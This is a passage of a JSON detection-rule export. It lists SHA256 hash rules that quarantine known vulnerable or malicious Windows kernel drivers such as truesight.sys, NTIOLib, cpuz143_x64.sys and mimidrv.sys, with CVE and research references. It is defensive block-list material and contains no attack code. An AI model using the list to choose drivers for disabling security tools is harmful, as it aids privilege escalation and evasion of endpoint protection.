+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.614700Z",
+ "creation_date": "2026-03-23T11:45:29.614702Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.614708Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "9254f012009d55f555418ff85f7d93b184ab7cb0e37aecdfdab62cfe94dea96b",
+ "comment": "MICRO-STAR vulnerable drivers (aka NBIOLib_X64.sys, NTIOLib_X64.sys, NTIOLib.sys and NBIOLib.sys) [CVE-2021-44899] [http://blog.rewolf.pl/blog/?p=1630] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "45b8251c-2d88-589a-b737-2e6d1e6c782c",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.828423Z",
+ "creation_date": "2026-03-23T11:45:31.828425Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.828430Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "e4359b5925ca4333933552b4c44efe4f9d9378e54df71f7c70a9e2fdb20c2bbb",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "45c30462-2dfe-54f7-b520-75808fe202bc",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.811204Z",
+ "creation_date": "2026-03-23T11:45:31.811206Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.811212Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "33021ab48739c767cabe762c52a7720fafdd796f8b86027000cbcce295b04458",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "45c3597a-d563-5126-84f8-f26aefb09714",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.160830Z",
+ "creation_date": "2026-03-23T11:45:31.160832Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.160838Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "05f535063639c8bdfd1ef2054bff3f58ef9f4f30e88d7eeecb9f8ee915be535e",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "45d06e78-c471-5ae4-82ac-b14c298f662f",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.156672Z",
+ "creation_date": "2026-03-23T11:45:31.156674Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.156680Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "b76bdd3647d1124d3e750092a5bfaffa26b6c4f79e0891188c167f97ccb78675",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "45f62cec-5051-5f7b-a9f9-3df131519b39",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.821815Z",
+ "creation_date": "2026-03-23T11:45:30.821818Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.821827Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "665b45ff2a2054ffdb3ea55031802c1d7fd3db843ecbcf74b227e0200b37cd56",
+ "comment": "Vulnerable Kernel Driver (aka ComputerZ.Sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "45f69431-1fe9-57bf-b081-fe01af4598e8",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.486997Z",
+ "creation_date": "2026-03-23T11:45:31.487000Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.487008Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "5f437fc04c721810d1885248c8f6caa1438e3af339502d2319dd3fca265fcad7",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "46000d63-b246-570c-9312-3f794e710c45",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.148520Z",
+ "creation_date": "2026-03-23T11:45:31.148522Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.148527Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "e85fc55ac3ccd0525ca75e38f2b014d292e49fe6a3d795ff1714600e7120eb02",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "46013a0a-36d1-5140-abd5-83690ddb64b6",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.492945Z",
+ "creation_date": "2026-03-23T11:45:31.492955Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.492964Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "7e57d43143afad8fbefa89a9a9da758e3e22bb56c75f337dc78517a633716407",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "460187ee-1b30-5c92-a3cd-0d53b85c4095",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:32.147022Z",
+ "creation_date": "2026-03-23T11:45:32.147024Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:32.147029Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "16f83f056177c4ec24c7e99d01ca9d9d6713bd0497eeedb777a3ffefa99c97f0",
+ "comment": "Vulnerable Kernel Driver (aka ThrottleBlood.sys) [https://securelist.com/av-killer-exploiting-throttlestop-sys/117026/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "4613b875-0d91-5a2c-b65d-7ff847735fc0",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.606192Z",
+ "creation_date": "2026-03-23T11:45:29.606194Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.606199Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "88e2e6a705d3fb71b966d9fb46dc5a4b015548daf585fb54dfcd81dc0bd3ebdc",
+ "comment": "Process Explorer driver (aka PROCEXP.SYS and PROCEXP152.SYS) [https://learn.microsoft.com/en-us/sysinternals/downloads/process-explorer] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "46197192-f5c9-53ab-8c11-a765e383da3b",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.614998Z",
+ "creation_date": "2026-03-23T11:45:29.614999Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.615005Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "e83908eba2501a00ef9e74e7d1c8b4ff1279f1cd6051707fd51824f87e4378fa",
+ "comment": "MICRO-STAR vulnerable drivers (aka NBIOLib_X64.sys, NTIOLib_X64.sys, NTIOLib.sys and NBIOLib.sys) [CVE-2021-44899] [http://blog.rewolf.pl/blog/?p=1630] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "461a88fe-467f-5879-a1ab-0f061f0ae7cd",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.610898Z",
+ "creation_date": "2026-03-23T11:45:29.610900Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.610905Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "8c95d28270a4a314299cf50f05dcbe63033b2a555195d2ad2f678e09e00393e6",
+ "comment": "CPUID CPU-Z vulnerable driver (aka cpuz143_x64.sys) [CVE-2017-15302] [https://www.loldrivers.io/drivers/de003542-80e1-4aa0-9b99-ed8647a93a6e/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "461fb871-c844-5066-8f78-7de76b501241",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.814602Z",
+ "creation_date": "2026-03-23T11:45:31.814605Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.814614Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "a9293cc70bc90846a6a22e6b6b2db2c5c6a15c9607646a97277d0b2efc64191d",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "462d378c-22a9-5cf7-a851-c72a93328ae8",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.464424Z",
+ "creation_date": "2026-03-23T11:45:30.464427Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.464436Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "52f3905bbd97dcd2dbd22890e5e8413b9487088f1ee2fa828030a6a45b3975fd",
+ "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "4641820e-ef98-555c-80a7-466b06a7765f",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.817569Z",
+ "creation_date": "2026-03-23T11:45:31.817571Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.817577Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "8bbfcfb9793d8c06af261bdb80838a5b8d4a6623bd99207511179e49af015eb7",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "464a351e-996d-5c37-a861-927ae7688a82",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.817187Z",
+ "creation_date": "2026-03-23T11:45:31.817189Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.817195Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "79d14e50c465c3d395d636876edbbbe305843c745180f6cda854db28c97d4990",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "466d4cc1-2fc4-509b-a5d9-a32a6e3b7f6d",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.980323Z",
+ "creation_date": "2026-03-23T11:45:29.980325Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.980331Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "4c2d2122ef7a100e1651f2ec50528c0d1a2b8a71c075461f0dc58a1aca36bc61",
+ "comment": "Vulnerable Kernel Driver (aka rzpnk.sys) [https://www.loldrivers.io/drivers/1c6e1d3b-f825-4065-9e0c-83386883e40f/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "4678d189-f7e0-5062-9e72-c7c2aa9675b7",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.454153Z",
+ "creation_date": "2026-03-23T11:45:30.454156Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.454165Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "367035e87b8a361bdc51f55a2467b2606eb29feae3af892d8c17df1841c20b97",
+ "comment": "Vulnerable Kernel Driver (aka sandra.sys) [https://www.loldrivers.io/drivers/bc5e020a-ecff-43c8-b57b-ee17b5f65b21/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "4681e49b-3a92-5ed3-9955-eee7b359aa2c",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.622862Z",
+ "creation_date": "2026-03-23T11:45:29.622864Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.622881Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "542cd21b0c835b818e6b2eea2efe5b340ff3d554b2b7e13af084f0817cc920fd",
+ "comment": "PassMark vulnerable driver (aka DirectIo32.sys and DirectIo64.sys) [CVE-2020-15479] [https://github.com/eset/vulnerability-disclosures/blob/master/CVE-2020-15479/CVE-2020-15479.md] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "4688935a-aa68-54bb-8403-ccd265f93dec",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.831730Z",
+ "creation_date": "2026-03-23T11:45:30.831732Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.831738Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "69e26ad15c0a8128af8b33d0eed0674137f040386fba9bdb2951f5316380047f",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "468b5f63-5c34-568c-a2ae-1478c843abb9",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.816845Z",
+ "creation_date": "2026-03-23T11:45:30.816849Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.816855Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "63865f04c1150655817ed4c9f56ad9f637d41ebd2965b6127fc7c02757a7800e",
+ "comment": "Vulnerable Kernel Driver (aka CP2X72C.SYS) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "468ef357-2cbb-5060-a4fe-f2c4969e2a73",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.472781Z",
+ "creation_date": "2026-03-23T11:45:31.472785Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.472794Z",
+ "rule_level": null,
+ "rule_level_override": null,
